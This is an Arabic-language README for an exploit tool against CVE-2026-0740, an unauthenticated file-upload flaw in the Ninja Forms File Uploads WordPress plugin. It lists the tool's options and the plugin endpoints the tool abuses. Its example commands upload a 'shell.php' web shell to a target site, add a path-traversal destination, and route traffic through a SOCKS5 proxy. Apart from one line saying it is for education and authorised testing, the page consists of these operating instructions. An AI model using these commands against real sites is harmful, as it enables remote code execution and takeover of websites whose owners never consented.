
Ninja Forms File Uploads <= 3.3.26 - رفع ملف تعسفي غير مصادق عليه
CVE-2026-0740 هي ثغرة رفع ملفات تعسفية بدون مصادقة تؤثر على:
Ninja Forms File Uploads ≤ 3.3.26 (إضافة ووردبريس)
يسمح هذا العيب للمهاجمين برفع ملفات تعسفية إلى الخادم دون مصادقة، مما قد يؤدي إلى تنفيذ الأكواد عن بُعد (RCE).
هذا المشروع مقدم لأغراض تعليمية واختبار أمني مصرح به فقط.
تثبيت التبعيات:
pip install httpx httpx-socks
python3 CVE-2026-0740.py -t http://target.com -f shell.php
| Argument | الوصف |
|---|---|
-t, --target | عنوان الهدف |
-f, --file | الملف المراد رفعه |
-d, --dest | مسار الوجهة (اجتياز المسار) |
-x, --proxy | بروكسي SOCKS5 |
-H, --headers | رؤوس مخصصة |
--timeout | مهلة الطلب |
--no-color | تعطيل المخرجات الملونة |
-q, --quiet | وضع هادئ |
--verify-ssl | تفعيل التحقق من SSL |
python3 CVE-2026-0740.py \
-t https://victim.com \
-f shell.php \
-d ../../../../shell.php
admin-ajax.php/wp-admin/admin-ajax.phpnf_fu_get_new_noncenf_fu_upload/wp-content/uploads/هذا المشروع مرخص بموجب رخصة MIT — راجع ملف LICENSE للحصول على التفاصيل.
مرحبًا بطلبات السحب. بالنسبة للتغييرات الكبيرة، افتح مشكلة أولاً لمناقشة ما ترغب في تغييره.